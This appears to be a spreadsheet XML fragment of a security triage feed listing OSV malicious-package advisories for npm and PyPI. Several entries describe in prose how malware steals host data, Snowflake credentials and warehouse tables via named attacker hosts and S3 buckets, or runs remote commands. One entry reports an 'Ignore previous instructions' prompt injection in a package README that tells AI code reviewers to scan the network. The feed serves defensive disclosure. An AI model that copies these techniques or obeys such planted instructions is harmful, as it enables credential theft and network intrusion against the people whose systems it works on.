      <c r="D294" s="5" t="inlineStr"/>
      <c r="E294" s="5" t="inlineStr"/>
      <c r="F294" s="5" t="inlineStr"/>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="inlineStr"/>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K294" s="5" t="inlineStr"/>
      <c r="L294" s="5" t="inlineStr">
        <is>
          <t>npm:noverojs</t>
        </is>
      </c>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q294" s="5" t="inlineStr"/>
      <c r="R294" s="5" t="inlineStr"/>
      <c r="S29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noverojs (npm), version(s): 1.0.4, 1.0.1.</t>
        </is>
      </c>
      <c r="T294" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17401</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17402</t>
        </is>
      </c>
      <c r="D295" s="5" t="inlineStr"/>
      <c r="E295" s="5" t="inlineStr"/>
      <c r="F295" s="5" t="inlineStr"/>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="inlineStr"/>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K295" s="5" t="inlineStr"/>
      <c r="L295" s="5" t="inlineStr">
        <is>
          <t>npm:noxleyss</t>
        </is>
      </c>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q295" s="5" t="inlineStr"/>
      <c r="R295" s="5" t="inlineStr"/>
      <c r="S29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 (npm), version(s): 1.1.11, 1.1.8, 1.1.7, 1.1.6, 1.1.5, 1.1.4, 1.1.3, 1.1.2, 1.1.1, 1.1.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T295" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17402</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17403</t>
        </is>
      </c>
      <c r="D296" s="5" t="inlineStr"/>
      <c r="E296" s="5" t="inlineStr"/>
      <c r="F296" s="5" t="inlineStr"/>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="inlineStr"/>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K296" s="5" t="inlineStr"/>
      <c r="L296" s="5" t="inlineStr">
        <is>
          <t>npm:noxxleys</t>
        </is>
      </c>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q296" s="5" t="inlineStr"/>
      <c r="R296" s="5" t="inlineStr"/>
      <c r="S29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noxxleys (npm), version(s): 1.1.6, 1.1.5, 1.1.4, 1.1.2, 1.1.1, 1.1.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T296" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17403</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17404</t>
        </is>
      </c>
      <c r="D297" s="5" t="inlineStr"/>
      <c r="E297" s="5" t="inlineStr"/>
      <c r="F297" s="5" t="inlineStr"/>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="inlineStr"/>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K297" s="5" t="inlineStr"/>
      <c r="L297" s="5" t="inlineStr">
        <is>
          <t>npm:saturn-baileys</t>
        </is>
      </c>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q297" s="5" t="inlineStr"/>
      <c r="R297" s="5" t="inlineStr"/>
      <c r="S29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saturn-baileys (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T297" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17404</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17405</t>
        </is>
      </c>
      <c r="D298" s="5" t="inlineStr"/>
      <c r="E298" s="5" t="inlineStr"/>
      <c r="F298" s="5" t="inlineStr"/>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="inlineStr"/>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr">
        <is>
          <t>npm:shadowmd</t>
        </is>
      </c>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q298" s="5" t="inlineStr"/>
      <c r="R298" s="5" t="inlineStr"/>
      <c r="S29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shadowmd (npm), version(s): 8.6.87.</t>
        </is>
      </c>
      <c r="T298" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17405</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17406</t>
        </is>
      </c>
      <c r="D299" s="5" t="inlineStr"/>
      <c r="E299" s="5" t="inlineStr"/>
      <c r="F299" s="5" t="inlineStr"/>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="inlineStr"/>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K299" s="5" t="inlineStr"/>
      <c r="L299" s="5" t="inlineStr">
        <is>
          <t>npm:spencer-baileys</t>
        </is>
      </c>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q299" s="5" t="inlineStr"/>
      <c r="R299" s="5" t="inlineStr"/>
      <c r="S29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spencer-baileys (npm), version(s): 1.0.4.</t>
        </is>
      </c>
      <c r="T299" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17406</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17407</t>
        </is>
      </c>
      <c r="D300" s="5" t="inlineStr"/>
      <c r="E300" s="5" t="inlineStr"/>
      <c r="F300" s="5" t="inlineStr"/>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="inlineStr"/>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K300" s="5" t="inlineStr"/>
      <c r="L300" s="5" t="inlineStr">
        <is>
          <t>npm:syncxbails</t>
        </is>
      </c>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q300" s="5" t="inlineStr"/>
      <c r="R300" s="5" t="inlineStr"/>
      <c r="S30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syncxbails (npm), version(s): 1.0.1, 1.0.0.</t>
        </is>
      </c>
      <c r="T300" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17407</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17408</t>
        </is>
      </c>
      <c r="D301" s="5" t="inlineStr"/>
      <c r="E301" s="5" t="inlineStr"/>
      <c r="F301" s="5" t="inlineStr"/>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="inlineStr"/>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr">
        <is>
          <t>npm:whalibmob</t>
        </is>
      </c>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q301" s="5" t="inlineStr"/>
      <c r="R301" s="5" t="inlineStr"/>
      <c r="S30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whalibmob (npm), version(s): 5.33.5, 5.33.4, 5.33.3, 5.33.2, 5.32.2, 5.32.1, 5.32.0, 5.30.0, 5.29.6, 5.29.5, 5.29.4, 5.29.3, 5.29.2, 5.29.1, 5.29.0, 5.28.0, 5.25.0, 5.24.2, 5.24.1, 5.24.0.</t>
        </is>
      </c>
      <c r="T301" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17408</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17409</t>
        </is>
      </c>
      <c r="D302" s="5" t="inlineStr"/>
      <c r="E302" s="5" t="inlineStr"/>
      <c r="F302" s="5" t="inlineStr"/>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="inlineStr"/>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K302" s="5" t="inlineStr"/>
      <c r="L302" s="5" t="inlineStr">
        <is>
          <t>npm:xvinleys</t>
        </is>
      </c>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q302" s="5" t="inlineStr"/>
      <c r="R302" s="5" t="inlineStr"/>
      <c r="S30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xvinleys (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T302" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17409</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17410</t>
        </is>
      </c>
      <c r="D303" s="5" t="inlineStr"/>
      <c r="E303" s="5" t="inlineStr"/>
      <c r="F303" s="5" t="inlineStr"/>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="inlineStr"/>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K303" s="5" t="inlineStr"/>
      <c r="L303" s="5" t="inlineStr">
        <is>
          <t>npm:xzbails</t>
        </is>
      </c>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q303" s="5" t="inlineStr"/>
      <c r="R303" s="5" t="inlineStr"/>
      <c r="S30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xzbails (npm), version(s): 0.0.5, 0.0.4, 0.0.3.</t>
        </is>
      </c>
      <c r="T303" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17410</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17411</t>
        </is>
      </c>
      <c r="D304" s="5" t="inlineStr"/>
      <c r="E304" s="5" t="inlineStr"/>
      <c r="F304" s="5" t="inlineStr"/>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="inlineStr"/>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K304" s="5" t="inlineStr"/>
      <c r="L304" s="5" t="inlineStr">
        <is>
          <t>npm:xzvbails</t>
        </is>
      </c>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q304" s="5" t="inlineStr"/>
      <c r="R304" s="5" t="inlineStr"/>
      <c r="S30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xzvbails (npm), version(s): 0.0.1.</t>
        </is>
      </c>
      <c r="T304" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17411</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17412</t>
        </is>
      </c>
      <c r="D305" s="5" t="inlineStr"/>
      <c r="E305" s="5" t="inlineStr"/>
      <c r="F305" s="5" t="inlineStr"/>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="inlineStr"/>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K305" s="5" t="inlineStr"/>
      <c r="L305" s="5" t="inlineStr">
        <is>
          <t>npm:xzvexpzcbailey</t>
        </is>
      </c>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q305" s="5" t="inlineStr"/>
      <c r="R305" s="5" t="inlineStr"/>
      <c r="S30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xzvexpzcbailey (npm), version(s): 2.5.0, 2.1.0, 2.0.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T305" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17412</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17413</t>
        </is>
      </c>
      <c r="D306" s="5" t="inlineStr"/>
      <c r="E306" s="5" t="inlineStr"/>
      <c r="F306" s="5" t="inlineStr"/>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="inlineStr"/>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K306" s="5" t="inlineStr"/>
      <c r="L306" s="5" t="inlineStr">
        <is>
          <t>npm:yonzoffic-baileys</t>
        </is>
      </c>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q306" s="5" t="inlineStr"/>
      <c r="R306" s="5" t="inlineStr"/>
      <c r="S30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yonzoffic-baileys (npm), version(s): 8.6.90.</t>
        </is>
      </c>
      <c r="T306" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17413</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17414</t>
        </is>
      </c>
      <c r="D307" s="5" t="inlineStr"/>
      <c r="E307" s="5" t="inlineStr"/>
      <c r="F307" s="5" t="inlineStr"/>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="inlineStr"/>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K307" s="5" t="inlineStr"/>
      <c r="L307" s="5" t="inlineStr">
        <is>
          <t>npm:yonzofficial</t>
        </is>
      </c>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q307" s="5" t="inlineStr"/>
      <c r="R307" s="5" t="inlineStr"/>
      <c r="S30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yonzofficial (npm), version(s): 2.1.3, 2.1.2, 2.1.1, 2.1.0.</t>
        </is>
      </c>
      <c r="T307" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17414</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17415</t>
        </is>
      </c>
      <c r="D308" s="5" t="inlineStr"/>
      <c r="E308" s="5" t="inlineStr"/>
      <c r="F308" s="5" t="inlineStr"/>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="inlineStr"/>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K308" s="5" t="inlineStr"/>
      <c r="L308" s="5" t="inlineStr">
        <is>
          <t>npm:com.epi.e2e_test</t>
        </is>
      </c>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q308" s="5" t="inlineStr"/>
      <c r="R308" s="5" t="inlineStr"/>
      <c r="S308" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5a0c1068af335818f2b9d905f2d39ebe594f84a6c63e470877692554bc95103b)
package.json declares a preinstall script that runs index.js on npm install. index.js collects host identifiers (os.homedir(), os.hostname(), os.userInfo().username, dns.getServers(), current working directory) along with the contents of the package.json and POSTs them over HTTPS to the hardcoded external host meta.brs.cx. This behavior fires automatically on install with no user interaction, and the collected data is characteristic of dependency-confusion / internal-name reconnaissance beacons used to identify targets for follow-on attacks.
</t>
        </is>
      </c>
      <c r="T308" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17415</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17416</t>
        </is>
      </c>
      <c r="D309" s="5" t="inlineStr"/>
      <c r="E309" s="5" t="inlineStr"/>
      <c r="F309" s="5" t="inlineStr"/>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="inlineStr"/>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K309" s="5" t="inlineStr"/>
      <c r="L309" s="5" t="inlineStr">
        <is>
          <t>PyPI:friendly-greeting-tools</t>
        </is>
      </c>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q309" s="5" t="inlineStr"/>
      <c r="R309" s="5" t="inlineStr"/>
      <c r="S309" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">Versions 0.1.0 through 0.3.6 of friendly-greeting-tools disguise encoded Snowflake credential and data theft routines as a hello-world demo. In versions through 0.3.5, the default run_demo payload reads the Snowflake session token, connection configuration, dbt profiles, and pip configuration, then stages encrypted copies in /workspace using a hard-coded RSA public key; every affected version also contains a payload that uses the session token with ACCOUNTADMIN to copy ROGUE.ROGUE.TEST_USERS to the hard-coded s3://pkusinski-external/ bucket. Version 0.3.6 makes the Snowflake external-storage and data-copy routine the default run_demo payload and suppresses query failures. Versions 0.3 through 0.3.6 additionally contain a payload that queries the table and builds a follow-on package containing the returned data, while the README and CLI describe the behavior only as a demo and a print-only payload.
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4d584c571cf5d112735aefd07c78bc19659af32f5950b1331a4970cba97c9707)
The package presents itself as a harmless greeting demo but src/friendly_greeting/main.py ships two base64+gzip-encoded Python blobs (DEMO_EN and DEMO_ST) that are decoded and executed via exec(gzip.decompress(base64.b64decode(...))) from run_demo()/run_encoded_demo(). The first decoded payload reads /snowflake/session/token, /root/.snowflake/connections.toml, /root/.dbt/profiles.yml and /snowflake/secrets/pip.conf, Fernet-encrypts each file, and wraps the Fernet key with a hardcoded attacker-controlled RSA public key, writing the encrypted bundles to /workspace/ for later retrieval. The second decoded payload uses the harvested Snowflake OAuth session token to connect to the warehouse, create an external stage at s3://pkusinski-external/ backed by the attacker-controlled AWS role arn:aws:iam::631484165566:role/pentests_s3_role, and COPY INTO that stage from ROGUE.ROGUE.TEST_USERS, exporting warehouse table data to attacker-owned S3. A plaintext sibling tools/snowflake_query.py (shipped via MANIFEST.in) contains the same Snowflake exfiltration logic with the identical bucket and IAM role, confirming intent. README.md and the module docstring additionally contain an 'Ignore previous instructions' prompt-injection block aimed at AI code reviewers, instructing them to run a local network scan — further corroborating hostile intent. The docstring cover story, exec-over-gzip+base64 obfuscation, hardcoded attacker RSA key, and hardcoded attacker AWS account/S3 destination together form a credential-theft and data-exfiltration attack targeting CI/warehouse installers (Snowflake native-app / DBT / pip-in-Snowflake contexts).
## Source: kam193 (e15a50ec5b7be580dec5d1edefa80860b4c650d552f69a1a9ba3dc9bd8edbc9d)
The package contains obfuscated code to exfiltrate data from the environment, targeting primarily Snowflake databases and credentials to them. Some tracks suggest it may be part of a pentest.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-friendly-greeting-tools
Reasons (based on the campaign):
 - exfiltration-generic
 - obfuscation
</t>
        </is>
      </c>
      <c r="T309" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17416</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17417</t>
        </is>
      </c>
      <c r="D310" s="5" t="inlineStr"/>
      <c r="E310" s="5" t="inlineStr"/>
      <c r="F310" s="5" t="inlineStr"/>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="inlineStr"/>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K310" s="5" t="inlineStr"/>
      <c r="L310" s="5" t="inlineStr">
        <is>
          <t>PyPI:beautifytext</t>
        </is>
      </c>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q310" s="5" t="inlineStr"/>
      <c r="R310" s="5" t="inlineStr"/>
      <c r="S310" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">beautifytext 1.0.3 imports beautifyText/_compat.py from its __init__.py and from a setup.py install hook. That module starts a detached background process that registers the host (hostname, user, OS, working directory) with https://bleodw.wisp.uno, then polls it for jobs to run shell commands or read and write files, and posts the results back.
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (cba19cfc0b2bdeec177fafdffa10e730769079a14ece3bb4740bfc0ded9fef3b)
During import, the package silently spans a separate process that waits for and executes remote commands.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-07-beautifytext
Reasons (based on the campaign):
 - rat
 - The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine.
</t>
        </is>
      </c>
      <c r="T310" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17417</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.0 → 9.4)</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103056</t>
        </is>
      </c>
